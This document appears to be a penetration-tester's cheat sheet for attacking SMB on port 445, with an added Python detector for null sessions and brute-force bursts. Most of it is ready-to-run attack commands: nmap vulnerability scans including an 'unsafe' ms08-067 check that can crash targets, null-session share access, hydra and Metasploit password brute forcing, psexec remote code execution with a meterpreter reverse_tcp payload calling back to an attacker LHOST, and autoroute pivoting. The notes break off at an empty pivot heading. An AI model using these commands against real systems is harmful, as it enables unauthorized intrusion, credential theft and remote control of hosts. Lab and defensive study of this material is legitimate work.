# SMB

**---Port 445---**\
Can also be used with port 139 //this was pre-Windows 2000, when SMB ran over NetBIOS and required a NetBIOS session. Now it is its own TCP protocol on 445. Several other UDP ports can also be involved when SMB is set up via the Windows NetBIOS API\
ls -1 /usr/share/nmap/scripts/smb\* //remember that all of these have arguments that you can pass with --script-args=\
we could also just run all of them with:\
nmap -p 445 --script smb\* \<ip>\
\
**SMB discovery:** (connect and return OS/SMB info)\
nmap 10.10.10.111 --script=smb-os-discovery\
\
**SMB Vulnerability Scan**:\
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10\
\
**SMB Users & Shares Scan:**\
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10\
\
**Connect to SMB share**:\
(Linux)\
smbclient //MOUNT/share\
smbclient -L 10.10.10.3\
smbclient -L lame\
smbclient -U "" \\\\\\\10.10.10.3\\\tmp //also try -N with this, which tells smbclient not to prompt for a password\
smbclient -N \\\\\\\172.16.80.22\\\tmp -U ""\
or\
smbclient -L 10.130.40.70 -U administrator\
\
(Windows)\
C:\\>net use \\\10.130.40.70\IPC$ password /u:administrator\
C:\\>net view \\\10.130.40.70\
\
\
**Nmap for SMB open:**\
\#nmap -p139,445 \<range or CIDR> --open //only shows IPs with smb open\
or\
\#nmap -v -p 139,445 10.11.1.1-254\
\
**Search for smb scripts in nmap NSE:**\
\#ls -l /usr/share/nmap/scripts/ |grep smb\
//use a script\
\#nmap -p 139,445 --script smb-enum-users \<ip>\
//check for vulns with check-vulns script\
\#nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 \<ip>\
\
//Searching for IPs vuln to ms08-067\
//--script-args passes arguments to the script; here we pass unsafe=1, which will attempt the exploit and crash the system if it is vulnerable.\
\#nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.5\
\
\
**SMB NULL session:**\
A null session is an unauthenticated NetBIOS/SMB session. It is allowed so that new computers can set up communications, but it can be abused up to Windows XP SP1, as SP2 is patched. You can still look for incorrect configurations. A null session also allows unauthenticated attackers to obtain large amounts of information about the machine, such as password policies, usernames, group names, machine names, and user and host SIDs. This Microsoft feature existed in SMB1 by default.\
SMB1 – Windows 2000, XP and Windows 2003.\
SMB2 – Windows Vista SP1 and Windows 2008\
SMB2.1 – Windows 7 and Windows 2008 R2\
SMB3 – Windows 8 and Windows 2012.\
\
\--\
**Null:**\
\#nmblookup -A 10.10.10.175\
\#smbmap -H 10.10.10.175\
List share contents:\
\#smbmap -R Replication -H 10.10.10.10\
Download a file: (will be placed in /usr/share)\
\#smbmap -R Replication -H 10.10.10.10 -A file.txt -q\
\
\
**Authed:**\
\#smbmap -d active.htb -u svc\_tgs -p somepasswrd -H 10.10.10.10\
List share contents:\
\#smbmap -d active.htb -u svc\_tgs -p somepasswrd -R Replication -H 10.10.10.10\
Download a file: (will be placed in /usr/share)\
\#smbmap -d active.htb -u svc\_tgs -p somepasswrd -R Replication -H 10.10.10.10 -A file.txt -q\
\--\
\
**Password Brute Forcing:**\
For protocols such as RDP and SMB, increasing the number of threads may not be possible due to protocol restrictions, making the password guessing process relatively slow. On top of this, the authentication negotiation of a protocol such as RDP is more time consuming than, say, HTTP, which slows down attacks on these protocols even more. However, while brute-forcing RDP may be a slower process than HTTP, a successful attack on RDP would often provide a bigger reward.\
\
//With MSF\
\#systemctl enable postgresql\
\#msfdb init\
\#msfconsole\
msf > use auxiliary/scanner/smb/smb\_login\
msf auxiliary(smb\_login) > set PASS\_FILE /usr/share/seclists/Passwords/best15.txt\
msf auxiliary(smb\_login) > set USER\_FILE /usr/share/seclists/Usernames/top\_shortlist.txt\
msf auxiliary(smb\_login) > set RHOSTS 10.130.40.70\
msf auxiliary(smb\_login) > run\
\
//hydra\
hydra -L usernames.txt -P /usr/share/john/password.lst 192.168.2.66 smb -V -f\
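From the defender's side, both the null session described above and the slow SMB password guessing described in this section leave a clear trace in Windows Security events. The script below is an added example, not part of the original page: it runs over a few constructed event records (not real logs) and flags ANONYMOUS LOGON network logons (null sessions) and bursts of failed network logons from one source (smb_login/hydra-style guessing). The field names and thresholds are assumptions for the demo.

```python
"""Detect SMB null sessions and password-guessing bursts in Windows Security events.
Added example, not from the original page; all records below are constructed, not real logs.
Event 4624 = successful logon, 4625 = failed logon, LogonType 3 = network (what SMB produces)."""
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, event_id, user, src, logon_type=3):
    """Build one simplified event record (constructed sample data, assumed field names)."""
    return {"ts": datetime.fromisoformat(ts), "id": event_id,
            "user": user, "src": src, "logon_type": logon_type}

SAMPLE_EVENTS = [
    ev("2024-05-01T10:00:01", 4624, "ANONYMOUS LOGON", "10.11.1.5"),   # null session
    ev("2024-05-01T10:00:02", 4624, "svc_tgs", "10.10.10.20"),         # normal logon
    ev("2024-05-01T10:30:00", 4625, "bob", "10.10.10.30"),             # one typo, not an attack
] + [  # six failures in 25 seconds from one source: a password-guessing burst
    ev("2024-05-01T10:01:%02d" % (i * 5), 4625, user, "192.168.2.66")
    for i, user in enumerate(["administrator", "admin", "guest", "backup", "svc", "bob"])
]

def find_null_sessions(events):
    """Source IPs that completed an anonymous network logon (a null session)."""
    return sorted({e["src"] for e in events
                   if e["id"] == 4624 and e["logon_type"] == 3
                   and e["user"].upper() == "ANONYMOUS LOGON"})

def find_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Sources with at least `threshold` failed network logons inside any sliding
    `window`; returns {src: (total_failures, sorted usernames tried)}."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] == 4625 and e["logon_type"] == 3:
            by_src[e["src"]].append(e)
    hits = {}
    for src, fails in by_src.items():
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it spans no more than `window`
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[src] = (len(fails), sorted({f["user"] for f in fails}))
                break
    return hits
```

The single failure from 10.10.10.30 stays below the threshold, so ordinary typos are not reported; lowering `threshold` to 1 turns the same logic into a plain failed-logon listing.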
\
\
\- look into *dumpsec* for automated dumping of SMB information\
\
\
**Enumerate shares (Authenticated):**\
\#nmap --script=smb-enum-users -p 445 10.130.40.70 --script-args smbuser=administrator,smbpass=password\
//we can also use rpcclient and enumdomusers for this\
\
\
**RCE (Authenticated):**\
\
//Manual\
If we have writable shares we can use psexec\
\#psexec.py active.htb/svc\_tgs\@10.10.10.10\
\
//MSF\
msf > use exploit/windows/smb/psexec\
msf exploit(psexec) > set RHOST 10.130.40.70\
msf exploit(psexec) > set SMBPass password\
msf exploit(psexec) > set SMBUser administrator\
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse\_tcp\
msf exploit(psexec) > set LHOST 172.16.10.5\
msf exploit(psexec) > exploit\
meterpreter > sysinfo\
\
\
\--------------------- Post Exploitation -------------------\
\
**Host discovery:**\
//This is to attempt pivoting from the compromised box we are on. First we set up our routing, then we scan.\
meterpreter > run autoroute -s 172.30.111.0/24\
meterpreter > background\
msf exploit(psexec) > use auxiliary/scanner/portscan/tcp\
msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24\
msf auxiliary(tcp) > set THREADS 10\
msf auxiliary(tcp) > set PORTS 139,445\
msf auxiliary(tcp) > run\
\
\
**Null session pivot to another box:**\

